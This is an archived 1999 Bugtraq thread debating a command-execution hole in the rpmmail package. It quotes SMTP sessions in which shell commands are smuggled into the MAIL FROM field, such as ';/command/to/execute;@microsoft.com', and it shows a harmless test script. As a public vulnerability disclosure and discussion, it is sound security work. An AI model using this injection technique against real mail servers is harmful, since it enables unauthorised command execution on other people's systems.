Bugtraq mailing list archives
Re: RH6.0 local/remote command execution
From: btellier () WEBLEY COM (Brock Tellier)
Date: Tue, 12 Oct 1999 09:46:46 -0500
Alright, this is getting a little silly. THIS IS NOT A HOLE IN SENDMAIL OR ANY OTHER MTA! AHH! PLEASE read the entire post before emailing me or this list about how it does or does not work! To review: This is a hole in the RPMMAIL PACKAGE! RPMMAIL sets up an account called rpmmail and a .forward file that executes /home/rpmmail/rpmmail by piping the message recieved from whatever MTA you use into it. Thus all we need is for the MTA to pipe a message to rpmmail that contains metacharacters in the From: field. That's it. The only discussion of MTA's is about whether Sendmail or Smail will allow from fields which do not contain the "@whatever.com" piece. Smail does not require this, Sendmail does. Period. -Brock
ok This is what I have done and it does not work on RedHat 6.0 Script started on Tue Oct 12 10:17:23 1999 [> [root@blair /tmp]# uname -a Linux blair.idefense.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown [> [root@blair /tmp]# ls -l /tmp/test - -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 /tmp/test [> [root@blair /tmp]# cat /tmp/test #!/bin/sh echo "you have been hacked" > /tmp/test.output [> [root@blair /tmp]# telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 blair.ipartnership.com ESMTP Sendmail 8.9.3/8.9.3; Tue, 12 Oct 1999 10:17:50 -0400 mail from: ;/tmp/test;@microsoft.com 250 ;/tmp/test;@microsoft.com... Sender ok rcpt to: root 250 root... Recipient ok data 354 Enter mail, end with "." on a line by itself testing . 250 KAA15029 Message accepted for delivery quit 221 blair.ipartnership.com closing connection Connection closed by foreign host. [> Connection closed by foreign host. [root@blair /tmp]# ls -l /tmp total 817 drwx------ 2 root root 1024 Sep 21 10:53 orbit-root - -rw-rw-r-- 1 root root 0 Oct 12 10:17 output - -rwxr-xr-x 1 root root 10240 Oct 7 14:15 sniffit.0.3.5.p1.tar - -rwxr-xr-x 1 root root 819200 Oct 7 14:16 sniffit.0.3.5.tar - -rwxr-xr-x 1 fiji fiji 57 Oct 11 14:53 test [> [root@blair /tmp]# Script done on Tue Oct 12 10:18:27 1999 as we can see there is no /tmp/test.output. - -Fiji - -----Original Message----- From: Brock Tellier [mailto:btellier () WEBLEY COM] Sent: Monday, October 11, 1999 12:02 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: Re: RH6.0 local/remote command execution There seems to be some confusion regarding this post. Let me try to explain. This post is titled "RH6.0 local/remote command execution" only because rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of course, install rpmmail on any other linux variant, such as SuSE, which is what I did. I believe I made this clear when I pasted:bash-2.03$ cat /etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown uid=100(xnec) gid=100(users) groups=100(users)In any case, as "D" pointed out,MAIL FROM: ;/command/to/execute; 553 ;/command/to/execute;... Domain name required MAIL FROM: ;/command/to/execute;@microsoft.com 250 ;/command/to/execute;@microsoft.com... Sender okshould work on sendmail 8.9.3. - -BrockThat does not look like the MTA that comes with RH 6.0. That issmail notsendmail. I tryed this on my RH 6.0 install and it didn't work. Notice the "220 fear62 Smail-3.2" It's not sendmail. -----Original Message----- From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf OfNeezamHaniff Sent: Wednesday, October 06, 1999 12:50 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: RH6.0 local/remote command execution Hi, Here are some comments below...The remote exploit is merely: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 199911:31:13 -0500(CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 <rpmmail> ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quitI find this odd that this exploit could exist on a Red Hat 6.0installation.sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address sinceit'snot qualifiable. Please confirm this. This is what I get when I testthisscenario on a Red Hat 6.0 system: [> > [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400 helo x.x 250 dhcp-160-190.x.x Hello IDENT:> > 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost[127.0.0.1], pleased tomeet you MAIL FROM: ;/command/to/execute; 553 ;/command/to/execute;... Domain name required The only way someone could take advantage of this exploit is iftheir mailerconfiguration allows for the sender to non-qualifiable. Neezam.-----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 Comment: Encrypted Document from Infrastructure Defense, Inc. iQA/AwUBOANEhIKtj2fJZe4vEQK+FwCbBKM5fYtsEAI3TCYnFEmxZXs0tQEAoLQw Ho6rCei3wCD8Xfb3Q5+I7XSd =8GsP -----END PGP SIGNATURE-----
Current thread:
- RH6.0 local/remote command execution Brock Tellier (Oct 04)
- <Possible follow-ups>
- Re: RH6.0 local/remote command execution Danny Crawford (Oct 08)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 11)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 12)